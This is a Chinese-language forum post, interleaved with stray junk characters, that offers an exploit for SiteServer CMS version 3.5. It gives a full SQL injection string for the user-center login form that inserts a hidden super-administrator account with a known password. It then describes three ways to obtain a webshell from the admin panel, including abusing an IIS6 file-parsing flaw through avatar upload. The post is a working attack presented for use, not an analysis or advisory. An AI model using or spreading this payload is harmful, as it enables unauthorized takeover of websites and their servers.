经测试秒杀最新的3.5版; T, H' a1 G% m" _ X
stieserver官网:www.siteserver.cn& S2 L; l/ B1 Q& B6 r
EXP:/ ~4 V4 N' F) S: D$ v
直接访问UserCenter/login.aspx; ^- v2 |- {# ~; N7 T) v$ v6 w) a
用户名处输入:! N! u3 }/ e, N. p$ I) y. N, I
' k; q+ s5 E) ]1 J" }123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
" [/ z1 B3 X+ Z; q1 _4 v密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。' W( h; l7 k0 E: U0 b
之后再访问后台SiteServer/login.aspx用插入的用户登陆) @, j4 Q+ H& G, j5 s9 t
后台拿webshell的三种方法:6 E% U2 j5 B# L+ h' N
一、' J |2 @* e( i) K( w
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
* \/ a/ X& V! L+ u! Z/ ?二、
& h4 `* R! A( f- U成员权限-》添加用户-》用户名为:1.asp7 Q, l$ l5 a7 n5 D7 w% c+ e7 J! Z& z
http://127.0.0.1/usercenter/
a- x9 u( o. t1 C用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell3 t2 c2 N3 H! r2 n* y! V
(ps:后台添加用户时不会验证是否含有非法字符)
0 e; P( F1 y4 G! G& @, F三、$ p5 b4 ^3 V3 j* q4 A3 f9 v
系统工具-》实用工具-》机器参数查看/ o5 T; |& D* q
可以看到数据库类型、名称,WEB路径
$ t5 I, P5 X; P! \- _4 f系统工具-》数据库工具-》SQL语句查询1 s G8 u% b A9 Q/ H: T9 c u
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |